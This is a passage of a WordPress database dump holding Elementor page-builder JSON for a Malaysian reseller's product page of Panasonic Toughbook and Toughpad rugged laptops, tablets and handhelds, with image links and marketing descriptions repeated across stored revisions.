L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":35},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3740,2691,'_elementor_version','0.4'),(3743,2692,'_elementor_edit_mode','builder'),(3744,2692,'_elementor_template_type','post'),(3745,2692,'_wp_page_template','template-fullwidth.php'),(3746,2692,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":35},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the 